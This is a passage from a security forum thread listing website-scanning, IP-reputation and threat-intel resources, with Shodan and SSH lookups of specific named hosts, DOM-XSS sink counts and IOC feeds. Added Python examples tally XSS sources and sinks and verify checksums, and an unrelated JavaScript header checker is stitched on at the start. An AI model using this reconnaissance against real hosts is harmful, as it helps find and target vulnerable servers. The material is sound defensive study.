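    else if (key === "preload") out.preload = true;
  }
  return out;
}

// Preload list requirements: max-age of at least one year (31536000 s),
// includeSubDomains, and the preload token.
const ONE_YEAR = 31536000;
function hstsPreloadEligible(value) {
  if (!value) return false;
  const h = parseHsts(value);
  return h.maxAge >= ONE_YEAR && h.includeSubDomains && h.preload;
}

// "directive value value; ..." into { directive: [values] }.
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Directives the scan recommends. default-src is a fallback for the fetch
// directives but not for base-uri or frame-ancestors, which must be explicit.
const WANTED_DIRECTIVES = ["script-src", "object-src", "base-uri", "frame-src"];
const NO_FALLBACK = new Set(["base-uri", "frame-ancestors"]);

function evaluateHeaders(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const csp = h["content-security-policy"] ? parseCsp(h["content-security-policy"]) : {};
  const findings = [];

  if (!hstsPreloadEligible(h["strict-transport-security"])) {
    findings.push("Strict-Transport-Security missing or not preload-eligible " +
      `(needs max-age>=${ONE_YEAR}; includeSubDomains; preload)`);
  }

  // Clickjacking: either X-Frame-Options or a CSP frame-ancestors directive.
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  const framingControlled =
    xfo === "DENY" || xfo === "SAMEORIGIN" || "frame-ancestors" in csp;
  if (!framingControlled) {
    findings.push("Missing clickjacking protection: set X-Frame-Options or " +
      "Content-Security-Policy: frame-ancestors 'none'");
  }

  const missing = WANTED_DIRECTIVES.filter(
    (d) => !(d in csp) && (NO_FALLBACK.has(d) || !("default-src" in csp)));
  if (missing.length) {
    findings.push("Missing Content-Security-Policy directive(s): " + missing.join(", "));
  }
  return findings;
}

// Constructed header sets: a weak one and a hardened one.
const WEAK_HEADERS = { "Strict-Transport-Security": "max-age=600" };
const HARDENED_HEADERS = {
  "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
  "Content-Security-Policy":
    "default-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
};
```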
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2020, 05:15:09 PM
To avoid JavaScript hiccups and weaknesses:
https://htmlcheatsheet.com/js/  (online interactive cheatsheet)

Next to url-stripper use https://www.convertcsv.com/url-extractor.htm
and Trace extension for Google Chrome & firefox.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2020, 05:33:12 PM
Millions and millions of vulnerable SSH servers: https://blog.rapid7.com/2020/08/28/nicer-protocol-deep-dive-secure-shell-ssh/

check with Rebex SSH Check: https://sshcheck.com

Random example: https://sshcheck.com/server/87.98.242.21/

And in another case we could stumble on e.g. -https://assets.plesk.com/static/default-website-content/public/default-server-index.js
via -http://178.33.71.11   all out there on the cold & insecure Interwebz. We should all care for better security, shouldn't we really?

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2020, 11:06:08 PM
Test also in case of cert issues: https://www.webpagetest.org/result/200901_52_c2a7f61a65a9e66a520524946e966718/
Random example. Retested here: https://www.webpagetest.org/result/200904_8D_1f85ed1eef2081770e447b04e48a3dd3/
json results: https://www.webpagetest.org/jsonResult.php?test=200904_8D_1f85ed1eef2081770e447b04e48a3dd3&pretty=1
HAR file blocked by MBAM extension as File blocked: blob:https://obfuscator.io/9d519935-84da-4447-87f7-67a5613d4525
not being downloaded...File blocked: -http://www.netresec.com/?page=PacketCache -> https://www.virustotal.com/gui/url/93300d5ad0804e4cd092be2962477da6138963d8c2bf3759daa918f941eaf29a/details
10 embedded IP detections: https://www.virustotal.com/gui/ip-address/81.95.105.80/detection

Can be combined with other scans and tests.

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2020, 02:55:49 PM
Abuse from IP, where to check: https://apility.io/search/52.217.81.116  (no abuse - random example)

Other resources:  https://ipremoval.sms.symantec.com/  and  https://www.cyren.com/security-center/cyren-ip-reputation-check
Re: https://ipinfo.io/AS42772  (random example) because of a check-up in https://www.stopforumspam.com/
Re: https://www.researchgate.net/publication/224240107_Abnormally_Malicious_Autonomous_Systems_and_Their_Internet_Connectivity
Re: https://www.statista.com/statistics/1028845/poland-autonomous-systems-where-candc-servers-were-hosted/
leading to publications like: https://www.cyber-threat-intelligence.com/publications/CNS2018-Cerber.pdf

Also: -https://www.threatstop.com/checkip but this website is being blocked due to possible suspicious activity by MBAM extension.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2020, 07:13:02 PM
Let us check a particular abuse IP = 185.132.53.11
See -1 red score here: https://apility.io/search/185.132.53.11
All the vulnerabilities on the server for that IP: https://www.shodan.io/host/185.132.53.11
Various reports on that IP here: https://urlhaus.abuse.ch/url/454419/
See: https://en.asytech.cn/check-ip/185.132.53.13  and  https://ipinfo.io/AS24961/185.132.53.0/24
and https://otx.alienvault.com/indicator/ip/185.132.53.11
and https://www.abuseipdb.com/check/185.132.53.11  &   https://cleantalk.org/blacklists/as24961/185.132.53.0/24
and https://www.anti-attacks.com/daten-abfrage/rir-abfrage/abfrage_rir_185.132.53.0-24
and https://www.threatsourcing.com/dnall-free.txt  &  listed here: https://m4lwhere.org/feeds/last_30d.txt

Tools and much more here: https://www.fortypoundhead.com/default.asp
as for instance this one: https://www.fortypoundhead.com/tools_ipcheck.asp

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 10, 2020, 10:15:19 PM
Additional deny list: https://rkn.darkbyte.ru/logs/19102018_1330.htm

Check IPs listed there against other resources, like: http://www.crimeflare.org:82/cgi-bin/cfdom2.cgi/nl37.1.201

Check against http://ipinfolookup.com/   &   https://db-ip.com/  &    https://www.virustotal.com/gui/ip-address/

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 13, 2020, 01:23:08 PM
Interesting resources also for backlinks and what is on a host:
Random example: https://host.io/chevallier.biz

Compare and check results against https://www.virustotal.com/gui/ip-address/  see under: relations there.

And also here: https://www.shodan.io/host/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 14, 2020, 06:30:53 PM
Scan your Magento CMS (webshop content management software) against vulnerabilities etc.:
https://www.magereport.com/

Mind that Magento version 1 has reached end of life now, and 2000 websites have been compromised with malware lately.
Read: https://sansec.io/research/largest-magento-hack-to-date   (info source = Sansec's  Willem de Groot).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 15, 2020, 02:08:38 PM
Collection of IP tools: http://afspraakloket.nl/
And http://ipindetail.com/ip-blacklist-checker/  But HTTPS Everywhere warns here for downgrading!
Also: https://www.brightcloud.com/tools/url-ip-lookup.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 15, 2020, 11:10:20 PM
The use of the Shodan search engine:
it can be used for protection, as you will read below, but also abused by state actors in order to compromise.

We may read: https://us-cert.cisa.gov/ncas/alerts/aa20-258a (report of the 14th of September 2020 late)

From that CISA report I quote:

Pre-attack analysis:
Quote
Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.
The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.

 

Random example: https://www.shodan.io/host/173.249.31.85  - We will be able to get a server nginx https page: via -http://173.249.31.85/ that means via an unencrypted connection - nginx version = 1.10.3 -  (attackers have other ways of establishing that this is indeed the version number in use there).

NGINX has a weird versioning system where even numbered releases (i.e. 1.10, 1.8, 1.6) are stable, and odd numbered releases (i.e. 1.11, 1.9, 1.7) are the mainline. Security fixes normally get patched into the stable branches pretty quickly.

We will not go into all such particulars as this is not the scope of this thread.

The security researcher is known to work in the reverse way to how the attacker and state actor operate.

Same non-configured server page results are received from -http%3A%2F%2Fvmi213334.contaboserver.net

All we will get here is a status alert (as the site is non-configured):
Quote
Success. Failed to load resource: the server responded with a status of 404 (Not Found)
From the https page we will get
Quote
Script
isChrome: true
throttled: (fn, timeout) => {…}
v_browser: {loadTimes: ƒ, csi: ƒ, …}
Window
Global
and
Quote

console.log('[VULNERS] Init');

v_browser.runtime.sendMessage({ action: 'get_regexp'}, (rules) => {
    console.log('[VULNERS] Rules', rules);

    let html = document.documentElement.innerHTML;
    let matches = [];

    for (let rule of rules) {
        try {
            let match = html.match(new RegExp(rule.regex));

            if (match) {
                console.warn('[VULNERS] Match', rule.alias, match[0], match[1]);
                matches.push({url: document.location.host, rule, version: match[1]});
            }
        } catch(e) {
            console.warn('[VULNERS]', e)
        }
    }

    matches.length && v_browser.runtime.sendMessage({ action: 'match', matches: matches});
});

var origOpen = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function() {
    console.log('request started!');
    this.addEventListener('load', function() {
        console.log('request completed!');
        console.log(this.readyState); //will always be 4 (ajax is completed successfully)
        console.log(this.responseText); //whatever the response was
    });
    origOpen.apply(this, arguments);
};
 

And then we stumble upon the fact that nginx.org but also that nginx dot com is available as a link on that page ->
A DOM-XSS downgraded http scan, results in one http result and several wp-include https files...

Results from scanning URL: -http://nginx.com
Number of sources found: 10
Number of sinks found: 236

Results from scanning URL: -https://www.nginx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 0
Number of sinks found: 3

Results from scanning URL: -https://www.nginx.com/wp-includes/js/underscore.min.js?ver=1.8.3
Number of sources found: 3
Number of sinks found: 1

Results from scanning URL: -https://www.nginx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 35
Number of sinks found: 29

Results from scanning URL: -https://www.nginx.com/wp-content/themes/nginx-new/js/popper.min.js?ver=1.0
Number of sources found: 41
Number of sinks found: 17

Results from scanning URL: -https://www.nginx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 162
Number of sinks found: 34   (with all sort of mail domains)

Retirable and vulnerable code: https://retire.insecurity.today/#!/scan/fb3f45383d54a145eb02ed341cb0cf282502c84c6679c277c4c7a372181e180b

Going round the full circle, as we started with a Shodan IP scan, we now perform a Rebex SSH scan for that same IP,
delivering also interesting information about the host: https://sshcheck.com/server/173.249.31.85  together with some weak algorithms.

One should give security intelligence attention to keep the website and (web)server-infrastructure (behind it) as secure as possible. Let us all live up to what the avast mission is all about: keeping us all as secure as can be.

polonus (volunteer 3rd party cold reconnaissance website security analyst & website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2020, 10:49:23 AM
L.S.

DuckDuckGo removed from choice menu on Android.
Google gets rid of a privacy-friendly competitor by complying with EU rules in a sneaky way, outbidding it.

This is how "your fact-checking search engine monopolist" did this as predicted:

https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/

There is a way around this by installing Tor Browser on android, that has DuckDuckGo by default.

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on September 29, 2020, 10:58:33 AM
DuckDuckGo removed from choice menu on Android.
Google gets rid of a privacy-friendly competitor by complying with EU rules in a sneaky way, outbidding it.

This is how "your fact-checking search engine monopolist" did this as predicted:

https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/
:o >:(
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2020, 02:06:41 PM
Of course you can make your own choice not a pre-menu one of these twenty two alternative search engines:
https://kinsta.com/blog/alternative-search-engines/

Some are very specific like  Wolfram Alpha -> https://kinsta.com/blog/alternative-search-engines/#6-wolframalpha

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 29, 2020, 02:08:07 PM
L.S.

DuckDuckGo removed from choice menu on Android.
Google gets rid of a privacy-friendly competitor by complying with EU rules in a sneaky way, outbidding it.

This is how "your fact-checking search engine monopolist" did this as predicted:

https://spreadprivacy.com/search-preference-menu-duckduckgo-elimination/

There is a way around this by installing Tor Browser on android, that has DuckDuckGo by default.

polonus
I think it's a bit unfair to blame the giant Google for following the regulations.
The blame should be put squarely on the ones that made the regulations.
If a tax break is unfair, does that mean I shouldn't take it? Wrong. Change the law don't blame someone when they
take advantage of the law.
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2020, 06:15:07 PM
Hi bob3160,

You may be right there, authorities nowadays also have a commercial incline
and wanna earn some cents on the dollar from the market.

They also make use of Google's dominant position, they also do so playing out providers against each other.

One should normally have a choice from the top ten search-engines down.
Privacy friendly searching apparently has no priority for a lot of folks (end-users).

They don't feel the need, but if the service is free you will always pay with your data.

Or you could use Ecosia and the green Ecosia search engine alternative will plant trees from the extra ad-fees you generate.

Best privacy-friendly search-engines: https://restoreprivacy.com/private-search-engine/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2020, 06:47:57 PM
Check on IP for abuse...

Check IP for being a scam, random example: https://scamalytics.com/ip/194.33.61.33
while not having a bad rep here: https://ipremoval.sms.symantec.com/ipr/lookup

Blocklists: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/policy/use-an-external-dynamic-list-in-policy/palo-alto-networks-malicious-ip-address-feeds
Deny-list look-up: https://apility.io/search/194.33.61.33

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 04, 2020, 04:17:23 PM
L.S.

In this way we can also establish the % of found abuse on Tor-exit-nodes:
Check scamalytics.com/ip & apility.io/search/  & https://www.cyren.com/security-center/cyren-ip-reputation-check
& https://cleantalk.org/blacklists/78.46.73.176 (random example - blacklisted there)
against https://www.dan.me.uk/tornodes  &  https://www.bigdatacloud.com/insights/tor-exit-nodes
hourly updates: https://github.com/SecOps-Institute/Tor-IP-Addresses

Percentages vary from 1% (Hong Kong, Singapore) to a medium risk of under 45% of existing abuse.
Also the web reputation of hosters/AS of such IPs should be taken into account here.



polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2020, 06:54:28 PM
Blocked by Trace - tracking blocking extension = -https://static.addtoany.com/*
blocked url-path = -*hxtps://static.addtoany.com/menu/page.js*
blocked host URL = -*static.addtoany dot com*
blocked root domain = *addtoany dot com*

-> https://cookiepedia.co.uk/host/.addtoany.com

Another resource has server problems at the moment and kicks up an 500 application error: https://webcookies.org/cookies/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 09, 2020, 02:32:48 PM
Exploring info on a particular abuse IP: https://vulners.com/rst/RST:7CCC9BB6-0041-3A45-A211-8EBD315AF89F

This because of abuse mentioned here, a malware download reported:
https://urlhaus.abuse.ch/url/660405/ 

After 5 days re-analyzed and now 35 engines will detect this Mirai/elf/Mozi malcode: https://www.virustotal.com/gui/file/12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef/detection
Also see: https://www.virustotal.com/gui/file/12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef/relations

See new reports: https://www.virustotal.com/gui/file/12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef/community

Also consider: https://scamalytics.com/ip/118.172.176.41 - on host: https://urlhaus.abuse.ch/host/118.172.176.41/
Re: https://www.shodan.io/host/118.172.176.41 - no third party dependencies preventing

More particulars: https://cdn.statically.io/gl/curben/urlhaus-filter/master/urlhaus-filter-online.txt

Re: https://osint.digitalside.it/Threat-Intel/lists/latesturls.txt 

polonus

Title: Re: Tests and other Media topics
Post by: polonus on October 16, 2020, 02:00:24 PM
More threat IP info resources:

Starting here: https://blackip.ustc.edu.cn/sshrawlist.php?ip=37.49.226.220
Also: https://www.abuseipdb.com/check/37.49.226.220
and further historical records for that specific IP:
-> https://urlhaus.abuse.ch/url/372420/
-> https://badpackets.net/botnet-c2-detections/
listed also here: https://www.abuseat.org/iotcc.txt
medium fraud score of 11 given here: https://scamalytics.com/ip/37.49.226.220

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2020, 01:55:48 PM
We should scan for retirable (vulnerable or left) jQuery libraries using the Retire.JS extension or online here:
https://retire.insecurity.today/#  (both from Erlend Oftedal)

A similar procedure should now also be undertaken for node.js with Retire.JS, because of malicious npm packages that could open up a reverse shell like: plutov-slack-client, nodetest1010 and nodetest199 & npmpubman.

See: https://www.npmjs.com/snyk & http://snyk.github.io/docs/nodejs/
and https://developers.redhat.com/blog/2017/04/12/using-snyk-nsp-and-retire-js-to-identify-and-fix-vulnerable-dependencies-in-your-node-js-applications/

Gain insight into your website code with: Web Insight here: -> webint.io
Not suspicious this example, but given just to show how it functions:
https://webint.io/result/73907b10-113b-11eb-9432-8f38c91f3c54
But it could also be used to scan suspicious websites.  ;)

polonus


Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2020, 06:07:56 PM
Compare a number of different scan results:

1. https://urlscan.io/result/8958dea1-7023-4e0d-8420-373a46498113/

2. One could also scan through on the various code scan with this scan:
https://webint.io/result/4f38f860-1156-11eb-a034-11f74c826a95

3. Results of a DOM-XSS scan, just results: URL: -https://quiz.edusantosoficial.com.br/
Number of sources found: 133
Number of sinks found: 33

Results from scanning URL: -https://office.builderall.com/scripts/pixel/pixel-bundle.js
Number of sources found: 1
Number of sinks found: 1

Results from scanning URL: -https://office.builderall.com/scripts/pixel/pixel-bundle.js
Number of sources found: 8
Number of sinks found: 2

4. Vulnerable JQuery libraries scanned: https://retire.insecurity.today/#!/scan/1dea67faabb7371d011f80e7f204bfd692e686194ddc6a2fbdc5bc3de142bddc

Vulners does not detect here. Host details: https://www.shodan.io/host/45.162.228.138
Quote
Tracker SSL - Website is insecure by default
100% of the trackers on this site could be protecting you from NSA snooping. Tell -edusantosoficial.com.br to fix it.

Identifiers | All Trackers
 Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.

-skhXXXXXXXXXXXqjfuors7ai8tf -quiz.edusantosoficial.com.brphpsessid
 Tracking IDs could be sent safely if this site was secure.
 Tracking IDs do not support secure transmission.  Three Content Tracking Requests from facebook

5. Second opinion check at: https://webcookies.org/url/omni - this for privacy and tracking implications.

Quote
Domain Control Validation: Issuer:
Let's Encrypt
Let's Encrypt Authority X3

6. Compare with F-grade results here: https://observatory.mozilla.org/analyze/quiz.edusantosoficial.com.br

7. See 251 improvement hints given here: https://webhint.io/scanner/496ed38c-3df4-4792-921b-0564d55746fe

8. Given clear at this scan: http://isithacked.com/check/https%3A%2F%2Fquiz.edusantosoficial.com.br%2F

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2020, 11:05:47 PM
L.S.

See Erlend Oftedal's resources: https://github.com/RetireJS/retire.js

What can the above information deliver? Well, insight into potentially vulnerable and sometimes exploitable code.
All depends on what security layers are available there on client and server (best policies applied).

A short partial example:

So we can scan for a vulnerability in retirable script like:
Quote
{Object.defineProperty(w.Event.prototype,e,{enumerable:!0,configurable:!0,get:g(t)?function(){if(this.originalEvent)return t(this.originalEvent)}:function(){if(this.originalEvent)return
like mentioned in https://nvd.nist.gov/vuln/detail/CVE-2019-11358
for hxtps://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.slim.min.js
Re: https://retire.insecurity.today/#!/scan/a9194e28e3a8b9a10562a80c8c47ea88967f4a09c469e3bb769cfdad7ead9c68
Considering: Results from scanning URL: -https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.slim.min.js
Number of sources found: 33
Number of sinks found: 10

But skimming code for this manually is a difficult task, that is why we have our DOM XSS scanners, error scanners, our sources and sinks.

polonus
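Added example (not part of the post above and not retire.js or the DOM-XSS scanner's own code): a minimal sources-and-sinks tally over JavaScript text, plus the jQuery banner check behind the CVE-2019-11358 hit (prototype pollution, fixed in jQuery 3.4.0). The SOURCES and SINKS pattern lists are assumed and deliberately short, and SAMPLE_JS is a constructed snippet, not code from any scanned site.

```python
import re

# Assumed, deliberately short lists of DOM XSS sources (attacker-controlled
# inputs) and sinks (APIs that turn a string into code or markup). Real
# scanners track far more patterns and follow the data flow between them.
SOURCES = [
    r"location\.(?:hash|search|href)",
    r"document\.(?:URL|referrer|cookie)",
    r"window\.name",
    r"\.postMessage\s*\(",
]
SINKS = [
    r"\.(?:innerHTML|outerHTML)\s*=",
    r"document\.write(?:ln)?\s*\(",
    r"\beval\s*\(",
    r"\bsetTimeout\s*\(\s*['\"]",
    r"\.html\s*\(",
]


def count_sources_sinks(js: str) -> dict:
    """Tally source and sink hits in a JavaScript text, with line numbers."""
    hits = []
    for kind, patterns in (("source", SOURCES), ("sink", SINKS)):
        for pat in patterns:
            for m in re.finditer(pat, js):
                line = js.count("\n", 0, m.start()) + 1
                hits.append((kind, m.group(0), line))
    return {
        "sources": sum(1 for h in hits if h[0] == "source"),
        "sinks": sum(1 for h in hits if h[0] == "sink"),
        "hits": sorted(hits, key=lambda h: h[2]),
    }


def jquery_version(js: str):
    """Read the version out of jQuery's banner comment ('/*! jQuery v3.3.1 ...')."""
    m = re.search(r"/\*!\s*jQuery\s+v(\d+\.\d+\.\d+)", js)
    return m.group(1) if m else None


def affected_by_cve_2019_11358(js: str) -> bool:
    """CVE-2019-11358 (prototype pollution via $.extend) is fixed in jQuery 3.4.0,
    so any banner version below 3.4.0 is reported as affected."""
    v = jquery_version(js)
    return v is not None and tuple(int(x) for x in v.split(".")) < (3, 4, 0)


# Constructed sample: a jQuery 3.3.1 banner plus a page script that copies two
# sources straight into two sinks without any encoding.
SAMPLE_JS = """/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */
var q = location.hash.slice(1);
document.getElementById('out').innerHTML = q;
var ref = document.referrer;
eval("track('" + ref + "')");
"""

if __name__ == "__main__":
    r = count_sources_sinks(SAMPLE_JS)
    print(f"Number of sources found: {r['sources']}")
    print(f"Number of sinks found: {r['sinks']}")
    for kind, text, line in r["hits"]:
        print(f"  line {line}: {kind} {text}")
    print("jQuery", jquery_version(SAMPLE_JS),
          "affected by CVE-2019-11358:", affected_by_cve_2019_11358(SAMPLE_JS))
```

A raw count like this is what the "sources found / sinks found" numbers in the scan results mean; a hit only becomes a real DOM XSS when a source reaches a sink without encoding, which needs taint tracking rather than grep.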
Title: Re: Tests and other Media topics
Post by: polonus on October 19, 2020, 03:16:05 PM
For websites that have a Content Security Policy, it has often not been configured to follow so-called best policies.

There is a browser extension, CSP Evaluator, to check on this.
One could also do this online.

Example:  https://cspvalidator.org/#url=https://www.ad.nl/
CSP Evaluator gives:
Quote
Evaluated CSP as seen by a browser supporting CSP Version 3

[error] default-src
  [error] https:
    https: URI in default-src allows the execution of unsafe scripts.
  [check] blob:

[error] script-src
  [error] 'unsafe-inline'
    'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
  [help_outline] 'unsafe-eval'
    'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
  [error] https:
    https: URI in script-src allows the execution of unsafe scripts.

Error on opening screen where there is no CSP installed for
-Error fetching CSP policies from https://myprivacy.dpgmedia.nl/consent/?siteKey=V9f6VUvlHxq9wKIN&callbackUrl=https%3a%2f%2fwww.ad.nl%2fprivacy-gate%2faccept-tcf2%3fredirectUri%3d%252f   received from https://myprivacy.dpgmedia.nl/: 400 Bad Request

And also check online here: https://csp-evaluator.withgoogle.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 19, 2020, 05:23:08 PM
On the look-out for DNS sub-domains for a known malware domain?

Combine: (random example): https://urlhaus.abuse.ch/url/718410/
with https://securitytrails.com/domain/mituskicrafts.com/dns
and check here: https://www.dnssy.com/report.php

The web server appears to reveal version information. This can pose a security risk if vulnerabilities are identified in this version. You should consider disabling version information in your server configuration.

Compare to info here: https://host.io/mituskicrafts.com   
Check at: https://dnsdumpster.com/  &  https://subdomainfinder.c99.nl/ (finds Cloudflare abuse).
Whois info is redacted for privacy (or to hide abuse?).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2020, 12:01:18 AM
SHA1 insecurity

Here one can check all sorts of files against a so-called collision attack: https://shattered.io/
The test has been developed in cooperation with the Dutch CWI (Centrum voor Wiskunde & Informatica).
Also Google developers were involved.

Within most modern browsers like Google Chrome and also inside the Firefox browser,
we have been protected against insecure TLS/SSL certificates over the last three years.

Only it is a pity that whenever you download the Firefox browser,
the signature over that particular binary still exclusively makes use of insecure SHA1.

Get the checksum from the master repo and the actual download from a fast mirror.
Normally files now come digitally signed.

Now consider the above check as a checking method against silent file corruption,
so also with a digital file signature you could check at shattered.io.

Enjoy, my good friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
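Added example (not part of the post above and not shattered.io's or Mozilla's tooling): the "checksum from the master repo, download from a mirror" check done properly, i.e. parsing a sha256sum-style list, comparing in constant time, and refusing SHA-1 entries by default because collisions for it are practical. The installer bytes and the SUMS file are constructed in the script; no real download is involved.

```python
import hashlib
import hmac


def parse_sums(text: str) -> dict:
    """Parse sha256sum/sha1sum output ('<hexdigest>  <filename>' per line).
    The hash algorithm is inferred from the digest length.
    Returns {filename: (algorithm, hexdigest)}."""
    by_len = {40: "sha1", 64: "sha256", 128: "sha512"}
    sums = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")   # coreutils separator: two spaces
        name = name.lstrip("*").strip()          # a leading '*' marks binary mode
        algo = by_len.get(len(digest))
        if algo is None or not name:
            raise ValueError(f"unparseable checksum line: {line!r}")
        sums[name] = (algo, digest.lower())
    return sums


def verify(name: str, data: bytes, sums: dict, allow_sha1: bool = False) -> str:
    """Return 'ok', 'mismatch', 'unlisted' or 'weak-hash' for one downloaded file.
    SHA-1 entries are refused by default: a collision (two different files with
    the same digest) is practical, so a matching SHA-1 no longer proves the file
    is the one the publisher hashed."""
    if name not in sums:
        return "unlisted"
    algo, expected = sums[name]
    if algo == "sha1" and not allow_sha1:
        return "weak-hash"
    actual = hashlib.new(algo, data).hexdigest()
    # Constant-time comparison avoids leaking how many leading hex chars matched.
    return "ok" if hmac.compare_digest(actual, expected) else "mismatch"


# Constructed stand-ins for a download and a tampered copy (no real installer).
GOOD = b"pretend this is the installer fetched from a fast mirror"
TAMPERED = GOOD + b"\x00"

# Constructed SUMS file in the shape a publisher would serve from the master
# repo: one SHA-256 entry and one legacy SHA-1 entry.
SUMS_TEXT = (
    "# SHA256SUMS (constructed for this example)\n"
    f"{hashlib.sha256(GOOD).hexdigest()}  installer.exe\n"
    f"{hashlib.sha1(GOOD).hexdigest()}  *installer-legacy.exe\n"
)

if __name__ == "__main__":
    sums = parse_sums(SUMS_TEXT)
    for fname, blob in (("installer.exe", GOOD), ("installer.exe", TAMPERED),
                        ("installer-legacy.exe", GOOD), ("other.exe", GOOD)):
        print(f"{fname}: {verify(fname, blob, sums)}")
```

A checksum only protects against corruption or a tampered mirror when the list itself came over a separate, authenticated channel; a SUMS file served next to the binary on the same mirror proves nothing, which is why a digital signature over the SUMS file matters more than the hash algorithm alone.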
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2020, 02:38:44 PM
SSL check: crawl HTTPS websites for insecure content:
http://ssl-checker.online-domain-tools.com/
No longer secure and available: -http://ssl-checker.online-domain-tools.com/

Another one: https://www.cdn77.com/tls-test

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 20, 2020, 12:11:12 PM
EFF has launched a new tool to test the tracking protection of your browser with:
https://coveryourtracks.eff.org/

Coveryourtracks comes after Panopticlick was developed 10 years ago.
Read: https://www.eff.org/deeplinks/2017/11/panopticlick-30

Enjoy in your browser of choice,

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on November 20, 2020, 01:13:16 PM
EFF has launched a new tool to test the tracking protection of your browser with:
https://coveryourtracks.eff.org/
Thanks for sharing Damian, according to the test my browser setup is safe. 8)
Title: Re: Tests and other Media topics
Post by: polonus on November 21, 2020, 03:52:38 PM
Cisco: Emotet-malware now in over 200 countries.
Resources: https://any.run/malware-trends/emotet  &  https://feodotracker.abuse.ch/browse/

Example IP: https://www.shodan.io/host/24.101.229.82
Site report: https://sitereport.netcraft.com/?url=dynamic-acs-24-101-229-82.zoominternet.net
Confirmed: https://www.virustotal.com/gui/ip-address/24.101.229.82/community

Another two resources for TrickBot: https://novasense-threats.com/lookup/79.110.52.103#submenu
and https://pulsedive.com/threat/?tid=26
Also see: https://paste.cryptolaemus.com/emotet/2020/11/20/emotet-C2-Deltas-1200-1700_11-20-20.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 22, 2020, 12:06:21 AM
Various resources used at covert.io threat intelligence:
Quote
IOC Repositories
These repos contain threat intelligence generally updated manually when the respective orgs publish threat reports.

https://github.com/aptnotes/data
https://github.com/citizenlab/malware-indicators
https://github.com/da667/667s_Shitlist
https://github.com/eset/malware-ioc
https://github.com/fireeye/iocs
https://github.com/Neo23x0/signature-base/tree/master/iocs
https://github.com/pan-unit42/iocs
https://github.com/stamparm/maltrail/tree/master/trails/static/malware
https://github.com/stamparm/maltrail/tree/master/trails/static/suspicious
IOC Feeds
These URLs are data feeds of various types from scanning IPs from honeypots to C2 domains from malware sandboxes, and many other types. They were compiled from several sources, including (but not limited to): 1, 2, 3, 4, 5, 6. They are in alphabetical order.

http://antispam.imp.ch/wormlist
http://app.webinspector.com/recent_detections
http://atrack.h3x.eu/api/asprox_suspected.php
http://autoshun.org/files/shunlist.csv
http://blocklist.greensnow.co/greensnow.txt
http://botscout.com/last.htm
http://botscout.com/last_caught_cache.htm
http://charles.the-haleys.org/ssh_dico_attack_hdeny_format.php/hostsdeny.txt
http://cinsscore.com/list/ci-badguys.txt
http://cybercrime-tracker.net/all.php
http://cybercrime-tracker.net/ccam.php
